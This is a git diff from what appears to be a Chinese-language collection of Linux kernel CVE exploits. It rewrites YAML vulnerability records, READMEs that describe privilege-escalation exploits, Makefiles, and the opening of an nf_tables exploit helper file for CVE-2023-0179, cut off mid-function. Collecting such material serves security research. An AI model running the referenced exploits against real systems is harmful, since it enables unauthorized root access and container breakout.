-    - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id...	
-    - https://security.netapp.com/advisory/ntap-20220225-0004/
-  classification:
-    cvss-metrics:  CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
-    cvss-score: 8.8
-    cve-id: CVE-2021-4154
-    cwe-id: CWE-416
+id: CVE-2021-4154
+source: https://github.com/Markakd/CVE-2021-4154
+info:
+  name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。
+  severity: high
+  description: |
+    A use-after-free flaw was found in cgroup1_parse_param in kernel/cgroup/cgroup-v1.c in the Linux kernel's cgroup v1 parser. A local attacker with a user privilege could cause a privilege escalation by exploiting the fsconfig syscall parameter leading to a container breakout and a denial of service on the system.
+  scope-of-influence:
+    Linux Kernel versions prior to 5.14 rc2
+  reference:
+    - https://bugzilla.redhat.com/show_bug.cgi?id=2034514	
+    - https://cloud.google.com/anthos/clusters/docs/security-bulletins#gcp-2022-002	
+    - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id...	
+    - https://security.netapp.com/advisory/ntap-20220225-0004/
+  classification:
+    cvss-metrics:  CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
+    cvss-score: 8.8
+    cve-id: CVE-2021-4154
+    cwe-id: CWE-416
   tags: cve2021, 内存错误引用 
\ No newline at end of file
diff --git a/cve/linux-kernel/2021/yaml/CVE-2021-42008.yaml b/cve/linux-kernel/2021/yaml/CVE-2021-42008.yaml
index e34d9dd1..d906d816 100644
--- a/cve/linux-kernel/2021/yaml/CVE-2021-42008.yaml
+++ b/cve/linux-kernel/2021/yaml/CVE-2021-42008.yaml
@@ -1,21 +1,21 @@
-id: CVE-2021-42008
-source: https://github.com/bsauce/kernel-exploit-factory/tree/main/CVE-2021-42008
-info:
-  name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。
-  severity: high
-  description: |
-    The decode_data function in drivers/net/hamradio/6pack.c in the Linux kernel before 5.13.13 has a slab out-of-bounds write. Input from a process that has the CAP_NET_ADMIN capability can lead to root access
-  scope-of-influence:
-    Linux 2.1.94~v5.13.12
-  reference:
-    - https://nvd.nist.gov/vuln/detail/CVE-2021-42008
-    - https://cdn.kernel.org/pub/linux/kernel/v5.x/ChangeLog-5.13.13
-    - https://www.youtube.com/watch?v=d5f9xLK8Vhw
-  classification:
-    cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
-    cvss-score: 7.8
-    cve-id: CVE-2021-42008
-    cwe-id: CWE-787
-    cnvd-id:
-    kve-id:
+id: CVE-2021-42008
+source: https://github.com/bsauce/kernel-exploit-factory/tree/main/CVE-2021-42008
+info:
+  name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。
+  severity: high
+  description: |
+    The decode_data function in drivers/net/hamradio/6pack.c in the Linux kernel before 5.13.13 has a slab out-of-bounds write. Input from a process that has the CAP_NET_ADMIN capability can lead to root access
+  scope-of-influence:
+    Linux 2.1.94~v5.13.12
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-42008
+    - https://cdn.kernel.org/pub/linux/kernel/v5.x/ChangeLog-5.13.13
+    - https://www.youtube.com/watch?v=d5f9xLK8Vhw
+  classification:
+    cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 7.8
+    cve-id: CVE-2021-42008
+    cwe-id: CWE-787
+    cnvd-id:
+    kve-id:
   tags: 协议解码溢出
\ No newline at end of file
diff --git a/cve/linux-kernel/2021/yaml/CVE-2021-42327.yaml b/cve/linux-kernel/2021/yaml/CVE-2021-42327.yaml
index 883f6652..5beb14e6 100644
--- a/cve/linux-kernel/2021/yaml/CVE-2021-42327.yaml
+++ b/cve/linux-kernel/2021/yaml/CVE-2021-42327.yaml
@@ -1,23 +1,23 @@
-id: CVE-2021-42327
-source: https://github.com/docfate111/CVE-2021-42327
-info:
-  name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。
-  severity: medium
-  description: |
-    Linux内核5.14.14版本之前的驱动程序/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_debugfs.c 中的dp_link_settings_write允许攻击者基于堆的缓冲区溢出，攻击者可以将字符串写入 AMD GPU 显示驱动程序调试文件系统。当它使用 copy_from_user 的大小将用户空间缓冲区复制到 40 字节堆缓冲区时，不会检查 parse_write_buffer_into_params 内的大小。
-
-  scope-of-influence:
-    Linux kernel before 5.14.14
-
-  reference:
-    - https://nvd.nist.gov/vuln/detail/cve-2021-42327
-
-  classification:
-    cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
-    cvss-score: 6.7
-    cve-id: CVE-2021-42327
-    cwe-id: CWE-787
-    cnvd-id: None
-    kve-id: None
-
+id: CVE-2021-42327
+source: https://github.com/docfate111/CVE-2021-42327
+info:
+  name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。
+  severity: medium
+  description: |
+    Linux内核5.14.14版本之前的驱动程序/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_debugfs.c 中的dp_link_settings_write允许攻击者基于堆的缓冲区溢出，攻击者可以将字符串写入 AMD GPU 显示驱动程序调试文件系统。当它使用 copy_from_user 的大小将用户空间缓冲区复制到 40 字节堆缓冲区时，不会检查 parse_write_buffer_into_params 内的大小。
+
+  scope-of-influence:
+    Linux kernel before 5.14.14
+
+  reference:
+    - https://nvd.nist.gov/vuln/detail/cve-2021-42327
+
+  classification:
+    cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 6.7
+    cve-id: CVE-2021-42327
+    cwe-id: CWE-787
+    cnvd-id: None
+    kve-id: None
+
   tags: 缓冲区溢出
\ No newline at end of file
diff --git a/cve/linux-kernel/2021/yaml/CVE-2021-43267.yaml b/cve/linux-kernel/2021/yaml/CVE-2021-43267.yaml
index 38cb0b69..83f564c5 100644
--- a/cve/linux-kernel/2021/yaml/CVE-2021-43267.yaml
+++ b/cve/linux-kernel/2021/yaml/CVE-2021-43267.yaml
@@ -1,22 +1,22 @@
-id: CVE-2021-43267
-source: https://github.com/zzhacked/CVE-2021-43267
-info:
-  name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核
-  severity: critical
-  description:
-    该漏洞是由于Linux内核中的net/tipc/crypto.c存在溢出漏洞, TIPC在2020年9月引入的新用户消息类型“MSG_CRYPTO”, 其标头大小和消息大小都根据实际数据包大小进行验证, 但对于消息的keylen成员MSG_CRYPTO或密钥算法名称本身(TIPC_AEAD_ALG_NAME)的大小没有类似大小的检查, 这就导致恶意攻击者可以在此处构造一个较小的恶意数据包, 然后利用keylen成员属性的任意大小特性写入该位置的边界之外, 从而造成远程代码执行. 由于本地对于内核堆大小的控制更加容易, 因此该漏洞很容易在本地进行利用, 而因为TIPC本身的特性, 恶意攻击者也可以利用该漏洞实施远程攻击, 由于该漏洞利用方式简单, 危害较大.
-  scope-of-influence:
-    5.10-rc1 < Linux Kernel < 5.15
-  reference:
-    - https://www.sentinelone.com/labs/tipc-remote-linux-kernel-heap-overflow-allows-arbitrary-code-execution/
-    - https://thehackernews.com/2021/11/critical-rce-vulnerability-reported-in.html
-    - https://www.zdnet.com/article/remote-code-execution-flaw-patched-in-linux-kernel-tipc-module/#ftag=RSSbaffb68
-    - https://nvd.nist.gov/vuln/detail/CVE-2021-43267
-  classification:
-    cvss-metrics:  CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
-    cvss-score: 9.8
-    cve-id: CVE-2021-43267
-    cwe-id: CWE-20
-    cnvd-id: None
-    kve-id: None
+id: CVE-2021-43267
+source: https://github.com/zzhacked/CVE-2021-43267
+info:
+  name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核
+  severity: critical
+  description:
+    该漏洞是由于Linux内核中的net/tipc/crypto.c存在溢出漏洞, TIPC在2020年9月引入的新用户消息类型“MSG_CRYPTO”, 其标头大小和消息大小都根据实际数据包大小进行验证, 但对于消息的keylen成员MSG_CRYPTO或密钥算法名称本身(TIPC_AEAD_ALG_NAME)的大小没有类似大小的检查, 这就导致恶意攻击者可以在此处构造一个较小的恶意数据包, 然后利用keylen成员属性的任意大小特性写入该位置的边界之外, 从而造成远程代码执行. 由于本地对于内核堆大小的控制更加容易, 因此该漏洞很容易在本地进行利用, 而因为TIPC本身的特性, 恶意攻击者也可以利用该漏洞实施远程攻击, 由于该漏洞利用方式简单, 危害较大.
+  scope-of-influence:
+    5.10-rc1 < Linux Kernel < 5.15
+  reference:
+    - https://www.sentinelone.com/labs/tipc-remote-linux-kernel-heap-overflow-allows-arbitrary-code-execution/
+    - https://thehackernews.com/2021/11/critical-rce-vulnerability-reported-in.html
+    - https://www.zdnet.com/article/remote-code-execution-flaw-patched-in-linux-kernel-tipc-module/#ftag=RSSbaffb68
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-43267
+  classification:
+    cvss-metrics:  CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2021-43267
+    cwe-id: CWE-20
+    cnvd-id: None
+    kve-id: None
   tags: 堆溢出漏洞
\ No newline at end of file
diff --git a/cve/linux-kernel/2022/CVE-2022-0185/Makefile b/cve/linux-kernel/2022/CVE-2022-0185/Makefile
index 615313cf..47020636 100644
--- a/cve/linux-kernel/2022/CVE-2022-0185/Makefile
+++ b/cve/linux-kernel/2022/CVE-2022-0185/Makefile
@@ -1,2 +1,2 @@
-all: exploit.c
+all: exploit.c
 	gcc exploit.c -o exploit -static -no-pie -s
\ No newline at end of file
diff --git a/cve/linux-kernel/2022/CVE-2022-0185/README.md b/cve/linux-kernel/2022/CVE-2022-0185/README.md
index 90bfd2aa..33aeb800 100644
--- a/cve/linux-kernel/2022/CVE-2022-0185/README.md
+++ b/cve/linux-kernel/2022/CVE-2022-0185/README.md
@@ -1,10 +1,10 @@
-# CVE-2022-0185 pipe version
-
-Using pipe-primitive  to exploit CVE-2022-0185, so no kaslr leak nor smap smep ktpi bypass is needed :)
-
-(Q: What is pipe-primitive? A: https://github.com/veritas501/pipe-primitive)
-
-![](assets/it_works.png)
-
-### 漏洞检测程序来源
-- https://github.com/veritas501/CVE-2022-0185-PipeVersion
+# CVE-2022-0185 pipe version
+
+Using pipe-primitive  to exploit CVE-2022-0185, so no kaslr leak nor smap smep ktpi bypass is needed :)
+
+(Q: What is pipe-primitive? A: https://github.com/veritas501/pipe-primitive)
+
+![](assets/it_works.png)
+
+### 漏洞检测程序来源
+- https://github.com/veritas501/CVE-2022-0185-PipeVersion
diff --git a/cve/linux-kernel/2022/CVE-2022-0847/compile.sh b/cve/linux-kernel/2022/CVE-2022-0847/compile.sh
old mode 100755
new mode 100644
diff --git a/cve/linux-kernel/2022/CVE-2022-25636/README.md b/cve/linux-kernel/2022/CVE-2022-25636/README.md
index 72351dad..d6ed3ca0 100644
--- a/cve/linux-kernel/2022/CVE-2022-25636/README.md
+++ b/cve/linux-kernel/2022/CVE-2022-25636/README.md
@@ -1,29 +1,29 @@
-
-
-__漏洞概述：__
-
-攻击者可利用该漏洞访问越界内存，从而导致系统崩溃或进行提权。Linux内核中netfilter子组件引起的越界内存访问漏洞，Netfilter是Linux 2.4.x引入的一个子系统，提供了一整套hook函数的管理机制，实现了数据包过滤、NAT等功能。
-
-__环境：__
-
-Linux内核为5.13.0-30。
-
-__注意事项：__
-
-exploit并不是每次都生效（~40％），失败后需重新启动后再exploit。
-
-可利用可能破坏堆上的重要数据，或进行提权。
-
-__原理说明：__
-
-漏洞的发生点位于：
-
-​	linux\net\netfilter\nf_dup_netdev.c : 67 : nft_fwd_dup_netdev_offload
-
-​	在设置flow->rule->action.entries时没有对堆边界进行检查。
-
-__参考资料:__
-
-代码来自于 https://github.com/Bonfee/CVE-2022-25636
-
+
+
+__漏洞概述：__
+
+攻击者可利用该漏洞访问越界内存，从而导致系统崩溃或进行提权。Linux内核中netfilter子组件引起的越界内存访问漏洞，Netfilter是Linux 2.4.x引入的一个子系统，提供了一整套hook函数的管理机制，实现了数据包过滤、NAT等功能。
+
+__环境：__
+
+Linux内核为5.13.0-30。
+
+__注意事项：__
+
+exploit并不是每次都生效（~40％），失败后需重新启动后再exploit。
+
+可利用可能破坏堆上的重要数据，或进行提权。
+
+__原理说明：__
+
+漏洞的发生点位于：
+
+​	linux\net\netfilter\nf_dup_netdev.c : 67 : nft_fwd_dup_netdev_offload
+
+​	在设置flow->rule->action.entries时没有对堆边界进行检查。
+
+__参考资料:__
+
+代码来自于 https://github.com/Bonfee/CVE-2022-25636
+
 参考链接：https://www.openwall.com/lists/oss-security/2022/02/21/2
\ No newline at end of file
diff --git a/cve/linux-kernel/2022/CVE-2022-2588/exp_file_credential b/cve/linux-kernel/2022/CVE-2022-2588/exp_file_credential
old mode 100755
new mode 100644
diff --git a/cve/linux-kernel/2022/CVE-2022-27666/README.md b/cve/linux-kernel/2022/CVE-2022-27666/README.md
index 397df2c5..655cf99c 100644
--- a/cve/linux-kernel/2022/CVE-2022-27666/README.md
+++ b/cve/linux-kernel/2022/CVE-2022-27666/README.md
@@ -1,17 +1,17 @@
-**漏洞描述：**
-
-这是针对CVE-2022-27666的漏洞，该漏洞在UbuntuDesktop21.10上实现本地权限升级。本地攻击者可利用该漏洞通过覆盖内核堆对象获得特权。
-
-**影响版本：**
-
-linux kernel 5.17-rc5
-
-**漏洞危害**
-
-漏洞危害: 该漏洞源于net/ipv4/esp4.c 和 net/ipv6/esp6.c 中IPsec ESP 代码存在缓冲区溢出，此缺陷允许具有普通用户权限的本地攻击者覆盖内核堆对象，并可能导致本地权限升级威胁。
-
-**参考资料**
-
-代码来自：https://github.com/plummm/CVE-2022-27666
-
+**漏洞描述：**
+
+这是针对CVE-2022-27666的漏洞，该漏洞在UbuntuDesktop21.10上实现本地权限升级。本地攻击者可利用该漏洞通过覆盖内核堆对象获得特权。
+
+**影响版本：**
+
+linux kernel 5.17-rc5
+
+**漏洞危害**
+
+漏洞危害: 该漏洞源于net/ipv4/esp4.c 和 net/ipv6/esp6.c 中IPsec ESP 代码存在缓冲区溢出，此缺陷允许具有普通用户权限的本地攻击者覆盖内核堆对象，并可能导致本地权限升级威胁。
+
+**参考资料**
+
+代码来自：https://github.com/plummm/CVE-2022-27666
+
 参考链接：https://cdn.kernel.org/pub/linux/kernel/v5.x/ChangeLog-5.16.15
\ No newline at end of file
diff --git a/cve/linux-kernel/2022/CVE-2022-27666/compile.sh b/cve/linux-kernel/2022/CVE-2022-27666/compile.sh
old mode 100755
new mode 100644
diff --git a/cve/linux-kernel/2022/CVE-2022-27666/download_symbol.sh b/cve/linux-kernel/2022/CVE-2022-27666/download_symbol.sh
old mode 100755
new mode 100644
diff --git a/cve/linux-kernel/2022/CVE-2022-27666/run.sh b/cve/linux-kernel/2022/CVE-2022-27666/run.sh
old mode 100755
new mode 100644
diff --git a/cve/linux-kernel/2022/yaml/ CVE-2022-36946.yaml b/cve/linux-kernel/2022/yaml/ CVE-2022-36946.yaml
index eb773fd6..2c0bf1f0 100644
--- a/cve/linux-kernel/2022/yaml/ CVE-2022-36946.yaml	
+++ b/cve/linux-kernel/2022/yaml/ CVE-2022-36946.yaml	
@@ -1,18 +1,18 @@
-id: CVE-2022-36946
-source: https://github.com/Pwnzer0tt1/CVE-2022-36946
-info:
-  name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。
-  severity: 高危
-  description: |
-    Linux5.18.14 内核中 net/netfilter/nfnetlink_queue.c 的nfqnl_mangle允许远程攻击者造成拒绝服务 （panic），因为在具有单字节nfta_payload属性的nf_queue判定的情况下，skb_pull可能会遇到负的 skb->len。
-  scope-of-influence:
-     5.18.14
-  reference:
-    - https://nvd.nist.gov/vuln/detail/CVE-2022-36946
-    - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit?id=722d94847de29310e8aa03fcbdb41fc92c521756
-    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-36946
-  classification:
-    cvss-metrics:  CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
-    cvss-score: 7.5
-    cve-id: CVE-2022-36946
+id: CVE-2022-36946
+source: https://github.com/Pwnzer0tt1/CVE-2022-36946
+info:
+  name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。
+  severity: 高危
+  description: |
+    Linux5.18.14 内核中 net/netfilter/nfnetlink_queue.c 的nfqnl_mangle允许远程攻击者造成拒绝服务 （panic），因为在具有单字节nfta_payload属性的nf_queue判定的情况下，skb_pull可能会遇到负的 skb->len。
+  scope-of-influence:
+     5.18.14
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-36946
+    - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit?id=722d94847de29310e8aa03fcbdb41fc92c521756
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-36946
+  classification:
+    cvss-metrics:  CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
+    cvss-score: 7.5
+    cve-id: CVE-2022-36946
   tags: 拒绝服务,cve2022
\ No newline at end of file
diff --git a/cve/linux-kernel/2022/yaml/CVE-2022-0435.yaml b/cve/linux-kernel/2022/yaml/CVE-2022-0435.yaml
index 64fbf4c3..cdf3a35d 100644
--- a/cve/linux-kernel/2022/yaml/CVE-2022-0435.yaml
+++ b/cve/linux-kernel/2022/yaml/CVE-2022-0435.yaml
@@ -1,23 +1,23 @@
-id: CVE-2022-0435
-source:
-  https://github.com/wlswotmd/CVE-2022-0435
-info:
-  name: Linux kernel是Linux操作系统的主要组件, 也是计算机硬件与其进程之间的核心. 它负责两者之间的通信, 还要尽可能高效地管理资源. Linux kernel主要负责内存管理、进程管理、设备驱动程序、系统调用和安全防护四项作用.
-  severity: high
-  description: 
-    在Linux内核的TIPC协议功能中发现了一个堆栈溢出缺陷, 即用户发送带有恶意内容的数据包时, 域成员节点的数量高于允许的64个. 这个缺陷允许远程用户崩溃系统, 如果他们能够访问TIPC网络, 则可能提升其权限.
-  scope-of-influence:
-    linux_kernel 4, linux_kernel 5, Red Hat Enterprise Linux 8, redhat virtualization 4
-  references: 
-    - https://nvd.nist.gov/vuln/detail/CVE-2022-0435
-    - https://bugzilla.redhat.com/show_bug.cgi?id=2048738
-    - https://security.netapp.com/advisory/ntap-20220602-0001/
-    - https://www.openwall.com/lists/oss-security/2022/02/10/1
-  classification: 
-    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
-    cvss-score: 8.8
-    cvi-id: CVE-2022-0435
-    cwe-id: CWE-787
-    cnvd-id: None
-    kve-id: None
+id: CVE-2022-0435
+source:
+  https://github.com/wlswotmd/CVE-2022-0435
+info:
+  name: Linux kernel是Linux操作系统的主要组件, 也是计算机硬件与其进程之间的核心. 它负责两者之间的通信, 还要尽可能高效地管理资源. Linux kernel主要负责内存管理、进程管理、设备驱动程序、系统调用和安全防护四项作用.
+  severity: high
+  description: 
+    在Linux内核的TIPC协议功能中发现了一个堆栈溢出缺陷, 即用户发送带有恶意内容的数据包时, 域成员节点的数量高于允许的64个. 这个缺陷允许远程用户崩溃系统, 如果他们能够访问TIPC网络, 则可能提升其权限.
+  scope-of-influence:
+    linux_kernel 4, linux_kernel 5, Red Hat Enterprise Linux 8, redhat virtualization 4
+  references: 
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-0435
+    - https://bugzilla.redhat.com/show_bug.cgi?id=2048738
+    - https://security.netapp.com/advisory/ntap-20220602-0001/
+    - https://www.openwall.com/lists/oss-security/2022/02/10/1
+  classification: 
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 8.8
+    cvi-id: CVE-2022-0435
+    cwe-id: CWE-787
+    cnvd-id: None
+    kve-id: None
   tags: 提升权限, 堆栈溢出
\ No newline at end of file
diff --git a/cve/linux-kernel/2022/yaml/CVE-2022-2586.yaml b/cve/linux-kernel/2022/yaml/CVE-2022-2586.yaml
index d8579295..aa7b89c2 100644
--- a/cve/linux-kernel/2022/yaml/CVE-2022-2586.yaml
+++ b/cve/linux-kernel/2022/yaml/CVE-2022-2586.yaml
@@ -1,29 +1,29 @@
-id: CVE-2022-2586
-source: https://github.com/aels/CVE-2022-2586-LPE
-info:
-  name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。
-  severity: medium
-  description: |
-    Linux nf_tables cross-table存在安全漏洞，该漏洞源于释放后重用，允许本地特权攻击者在删除表时导致释放后重用，可能导致本地特权升级。
-  scope-of-influence:
-    Red Hat Enterprise Linux 9
-  reference:
-    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2586
-    - https://www.openwall.com/lists/oss-security/2022/08/09/5
-    - https://lore.kernel.org/netfilter-devel/20220809170148.164591-1-cascardo@canonical.com/T/#t
-    - https://www.zerodayinitiative.com/advisories/ZDI-22-1118/
-    - https://ubuntu.com/security/notices/USN-5557-1
-    - https://ubuntu.com/security/notices/USN-5560-1
-    - https://ubuntu.com/security/notices/USN-5560-2
-    - https://ubuntu.com/security/notices/USN-5562-1
-    - https://ubuntu.com/security/notices/USN-5564-1
-    - https://ubuntu.com/security/notices/USN-5565-1
-    - https://ubuntu.com/security/notices/USN-5566-1
-    - https://ubuntu.com/security/notices/USN-5567-1
-    - https://ubuntu.com/security/notices/USN-5582-1
-  classification:
-    cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
-    cvss-score: 6.7
-    cve-id: CVE-2022-2586
-    cnvd-id: NONE
+id: CVE-2022-2586
+source: https://github.com/aels/CVE-2022-2586-LPE
+info:
+  name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。
+  severity: medium
+  description: |
+    Linux nf_tables cross-table存在安全漏洞，该漏洞源于释放后重用，允许本地特权攻击者在删除表时导致释放后重用，可能导致本地特权升级。
+  scope-of-influence:
+    Red Hat Enterprise Linux 9
+  reference:
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2586
+    - https://www.openwall.com/lists/oss-security/2022/08/09/5
+    - https://lore.kernel.org/netfilter-devel/20220809170148.164591-1-cascardo@canonical.com/T/#t
+    - https://www.zerodayinitiative.com/advisories/ZDI-22-1118/
+    - https://ubuntu.com/security/notices/USN-5557-1
+    - https://ubuntu.com/security/notices/USN-5560-1
+    - https://ubuntu.com/security/notices/USN-5560-2
+    - https://ubuntu.com/security/notices/USN-5562-1
+    - https://ubuntu.com/security/notices/USN-5564-1
+    - https://ubuntu.com/security/notices/USN-5565-1
+    - https://ubuntu.com/security/notices/USN-5566-1
+    - https://ubuntu.com/security/notices/USN-5567-1
+    - https://ubuntu.com/security/notices/USN-5582-1
+  classification:
+    cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 6.7
+    cve-id: CVE-2022-2586
+    cnvd-id: NONE
   tags: netfilter, cve2022
\ No newline at end of file
diff --git a/cve/linux-kernel/2022/yaml/CVE-2022-32250.yaml b/cve/linux-kernel/2022/yaml/CVE-2022-32250.yaml
index 611fb2f1..62fd85c0 100644
--- a/cve/linux-kernel/2022/yaml/CVE-2022-32250.yaml
+++ b/cve/linux-kernel/2022/yaml/CVE-2022-32250.yaml
@@ -1,18 +1,18 @@
-id: CVE-2022-32250
-source: https://github.com/theori-io/CVE-2022-32250-exploit
-info:
-  name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。
-  severity: high
-  description: |
-    Linux内核5.18.1中的net/netfilter/nf_tables_api.c允许本地用户（能够创建用户/net命名空间）将权限升级到root，因为错误的NFT_STATEFUL_EXPR检查会导致释放后使用。
-  scope-of-influence:
-    Linux kernel 5.15.0-27
-  reference:
-    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32250
-    - https://www.cnnvd.org.cn/home/globalSearch?keyword=CVE-2022-32250
-  classification:
-    cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
-    cvss-score: 7.8
-    cve-id: CVE-2022-32250
-    cnvd-id: CNNVD-202206-407 
-  tags: CVSS严重性评级,修复信息,易受攻击的软件版本,SCAP映射,CPE信息,cve2022
+id: CVE-2022-32250
+source: https://github.com/theori-io/CVE-2022-32250-exploit
+info:
+  name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。
+  severity: high
+  description: |
+    Linux内核5.18.1中的net/netfilter/nf_tables_api.c允许本地用户（能够创建用户/net命名空间）将权限升级到root，因为错误的NFT_STATEFUL_EXPR检查会导致释放后使用。
+  scope-of-influence:
+    Linux kernel 5.15.0-27
+  reference:
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32250
+    - https://www.cnnvd.org.cn/home/globalSearch?keyword=CVE-2022-32250
+  classification:
+    cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 7.8
+    cve-id: CVE-2022-32250
+    cnvd-id: CNNVD-202206-407 
+  tags: CVSS严重性评级,修复信息,易受攻击的软件版本,SCAP映射,CPE信息,cve2022
diff --git a/cve/linux-kernel/2023/CVE-2023-0179/Makefile b/cve/linux-kernel/2023/CVE-2023-0179/Makefile
index 2a0391f0..9431825d 100644
--- a/cve/linux-kernel/2023/CVE-2023-0179/Makefile
+++ b/cve/linux-kernel/2023/CVE-2023-0179/Makefile
@@ -1,12 +1,12 @@
-objects= ./helpers.o ./exploit.o ./needle.o
-
-.PHONY: clean needle
-
-needle: $(objects)
-	$(CC) $(objects) -lmnl -lnftnl -o needle 
-
-./%.o: %.c
-	$(CC) -c $(CFLAGS) -o "$@" "$<"
-	
-clean:
-	rm -rf ./helpers.o ./needle.o ./needle ./exploit.o
+objects= ./helpers.o ./exploit.o ./needle.o
+
+.PHONY: clean needle
+
+needle: $(objects)
+	$(CC) $(objects) -lmnl -lnftnl -o needle 
+
+./%.o: %.c
+	$(CC) -c $(CFLAGS) -o "$@" "$<"
+	
+clean:
+	rm -rf ./helpers.o ./needle.o ./needle ./exploit.o
diff --git a/cve/linux-kernel/2023/CVE-2023-0179/helpers.c b/cve/linux-kernel/2023/CVE-2023-0179/helpers.c
index ca5ebf22..706ac927 100644
--- a/cve/linux-kernel/2023/CVE-2023-0179/helpers.c
+++ b/cve/linux-kernel/2023/CVE-2023-0179/helpers.c
@@ -1,395 +1,395 @@
-/*
- * ----------------------------------------------------------------------------
- * "THE BEER-WARE LICENSE" (Revision 42):
- * David Bouman (pql) wrote this file.  As long as you retain this notice you
- * can do whatever you want with this stuff. If we meet some day, and you think
- * this stuff is worth it, you can buy me a beer in return.   Signed, David.
- * ----------------------------------------------------------------------------
- */
-
-#define _GNU_SOURCE
-#include <stdlib.h>
-#include <time.h>
-#include <string.h>
-#include <arpa/inet.h>
-#include <stdint.h>
-#include <linux/netfilter.h>
-#include <linux/netfilter/nf_tables.h>
-#include <linux/netfilter/nfnetlink.h>
-#include <libmnl/libmnl.h>
-#include <libnftnl/table.h>
-#include <libnftnl/chain.h>
-#include <libnftnl/rule.h>
-#include <libnftnl/set.h>
-#include <libnftnl/expr.h>
-#include <net/if.h>
-#include <linux/if_packet.h>
-#include <fcntl.h>
-#include <limits.h>
-
-#include "helpers.h"
-
-unsigned long read_from_file(int line) {
-    int fd;
-    char buf[20];
-    unsigned long result;
-    char *endptr;
-    
-    fd = open("reg.log", O_RDONLY);
-    if (fd == -1) {
-        perror("open");
-        exit(1);
-    }
-
-    if (read(fd, buf, sizeof(buf)) == -1) {
-        perror("read");
-        close(fd);
-        exit(1);
-    }
-
-    if (line == 1 && read(fd, buf, sizeof(buf)) == -1) {
-        perror("read");
-        close(fd);
-        exit(1);
-    }
-    
-    result = strtoul(buf, &endptr, 16);
-    if (result == ULONG_MAX && endptr == buf) {
-        fprintf(stderr, "strtoul: invalid argument\n");
-        close(fd);
-        exit(1);
-    }
-    close(fd);
-    return result;
-}
-
-static uint64_t default_batch_req_handler(struct mnl_socket* nl, int portid, int table_seq)
-{
-    char buf[MNL_SOCKET_BUFFER_SIZE];
-
-    int ret = mnl_socket_recvfrom(nl, buf, sizeof(buf));
-
-    while (ret > 0) {
-        ret = mnl_cb_run(buf, ret, table_seq, portid, NULL, NULL);
-        if (ret <= 0) break;
-        ret = mnl_socket_recvfrom(nl, buf, sizeof(buf));
-    }
-    return ret;
-}
-
-int64_t send_batch_request(struct mnl_socket* nl, uint16_t msg, uint16_t msg_flags, uint16_t family, void** object, int* seq, uint64_t (*result_handler)(struct mnl_socket*, int, int))
-{
-    char buf[MNL_SOCKET_BUFFER_SIZE];
-    struct mnl_nlmsg_batch* batch = mnl_nlmsg_batch_start(buf, sizeof buf);
-    uint8_t msg_type = msg & 0xff;
-    uint8_t nft_type = (msg >> 8) & 0xff;
-    nftnl_batch_begin(mnl_nlmsg_batch_current(batch), (*seq)++);
-    mnl_nlmsg_batch_next(batch);
-    int table_seq = *seq;
-    struct nlmsghdr* nlh;
-
-    if (result_handler == NULL) {
-        result_handler = default_batch_req_handler;
-    }
-
-    if (msg == NFT_MSG_NEWSET) {
-        nlh = nftnl_set_nlmsg_build_hdr(
-            mnl_nlmsg_batch_current(batch),
-            NFT_MSG_NEWSET, family,
-            msg_flags | NLM_F_ACK, (*seq)++);
-    } else {
-        nlh = nftnl_nlmsg_build_hdr(
